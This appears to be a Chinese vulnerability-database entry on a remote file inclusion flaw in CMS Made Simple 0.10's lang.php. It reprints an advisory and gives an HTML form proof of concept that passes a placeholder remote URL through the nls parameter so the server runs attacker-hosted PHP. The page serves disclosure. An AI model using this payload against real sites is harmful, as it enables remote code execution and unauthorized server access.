|漏洞详情
CMSMadeSimple是一个易于使用的内容管理系统用于具有简单、稳定内容的网站。使用PHP,MySQL和Smarty模板引擎开发。它具有:基于角色的权限管理系统,智能缓存机制(只有当需要时才会从数据库获取),基于向导的安装与更新机制,对系统资源占用少,还包含文件管理,新闻发布和RSS模块等。CMSMadeSimple0.10及以前版本的lang.php文件的PHP远程文件包含漏洞允许远程攻击者通过nls参数[file][vx][vxsfx]执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/14709/info
CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
CMS Made Simple Version .10 and all prior versions are reported vulnerable.
example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
|参考资料
来源:SECUNIA
名称:16654
链接:http://secunia.com/advisories/16654/
来源:forum.cmsmadesimple.org
链接:http://forum.cmsmadesimple.org/index.php/topic,1549.0.html
来源:BID
名称:14709
链接:http://www.securityfocus.com/bid/14709
来源:BUGTRAQ
名称:20050831CMSMadeSimple<=0.10-PHPinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112552342004406&w;=2
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666